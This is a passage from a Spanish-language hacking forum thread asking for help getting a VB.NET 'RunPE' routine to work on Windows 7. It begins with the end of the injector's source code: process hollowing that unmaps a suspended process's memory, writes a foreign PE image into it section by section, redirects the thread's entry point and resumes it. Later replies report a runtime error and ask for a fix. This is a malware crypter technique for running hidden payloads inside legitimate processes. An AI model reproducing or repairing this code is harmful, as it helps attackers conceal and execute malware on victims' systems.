  380.        If GetThreadContext(pi.hThread, context) And _
  381.            ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _
  382.            ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then
  383.  
  384.            Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
  385.            If ImageBase <> 0 Then
  386.                WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret)
  387.  
  388.                lOffset = pidh.e_lfanew + 248
  389.                For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1
  390.                'math changes, anyone with pe understanding know
  391.                    Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType)
  392.                    Dim braw(Pish.SizeOfRawData) As Byte
  393.                    'more math for reading only the section.  mm API has a "shortcut" when you pass a specified startpoint.
  394.                    '.net can't use so you have to make a new array
  395.                    For j As Integer = 0 To Pish.SizeOfRawData - 1
  396.                        braw(j) = b(Pish.PointerToRawData + j)
  397.                    Next
  398.                    WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret)
  399.                    VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr)
  400.                Next i
  401.                Dim bb As Byte() = BitConverter.GetBytes(ImageBase)
  402.  
  403.                WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret)
  404.                context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
  405.                Call SetThreadContext(pi.hThread, context)
  406.                Call ResumeThread(pi.hThread)
  407.            End If
  408.        End If
  409.    End Sub
  410.  
  411.    Private Shared Function Protect(ByVal characteristics As Long) As Long
  412.        Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
  413.                        PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
  414.                        PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
  415.  
  416.        Protect = mapping(RShift(characteristics, 29))
  417.    End Function
  418.  
  419.    Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
  420.        RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
  421.    End Function
  422.    Private Shared Function vbLongToULong(ByVal Value As Long) As Double
  423.        Const OFFSET_4 = 4294967296.0#
  424.        If Value < 0 Then
  425.            vbLongToULong = Value + OFFSET_4
  426.        Else
  427.            vbLongToULong = Value
  428.        End If
  429.    End Function
  430.  
  431. End Class
En línea

Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Ayuda RunPe win7
« Respuesta #5 en: 9 Noviembre 2012, 00:05 am »

Ya lo habia probado tambien pero nop, ejecuto y me tira:

---------------------------
 Error irrecuperable
---------------------------
Error CLR: 80004005.
 El programa terminará ahora.
---------------------------
Aceptar   
---------------------------

Sera que hay que compilarlo de alguna forma en particular? probaste vos?

Gracias!
En línea

_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Ayuda RunPe win7
« Respuesta #6 en: 9 Noviembre 2012, 18:24 pm »

voy a buscar y corregir eso a ver q sale
En línea

Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Ayuda RunPe win7
« Respuesta #7 en: 11 Noviembre 2012, 02:00 am »

Dale muchas gracias maestro, espero tu respuesta :) Saludos
En línea

Cromatico

Desconectado Desconectado

Mensajes: 110


Ver Perfil
Re: Ayuda RunPe win7
« Respuesta #8 en: 30 Noviembre 2012, 13:19 pm »

Alguien tiene alguna novedad sobre este tema??

Saludos y gracias!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RunPE Killer V. 1.0 By Psymera
Ingeniería Inversa
psymera 6 6,993 Último mensaje 17 Septiembre 2009, 18:25 pm
por Arkangel_0x7C5
Que es un RunPE? « 1 2 »
Análisis y Diseño de Malware
x64core 11 12,816 Último mensaje 16 Octubre 2011, 11:29 am
por [Kayser]
Duda RunPE
Análisis y Diseño de Malware
[Kayser] 2 2,738 Último mensaje 10 Diciembre 2011, 13:34 pm
por [Kayser]
Bloqueo masivo de win7? [mensaje win7 no es original]
Windows
vvcepheus7 5 4,059 Último mensaje 1 Febrero 2012, 14:13 pm
por vvcepheus7
Funcionamiento de un RunPE « 1 2 »
Análisis y Diseño de Malware
[Kayser] 10 7,591 Último mensaje 29 Julio 2013, 19:53 pm
por arfgh
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines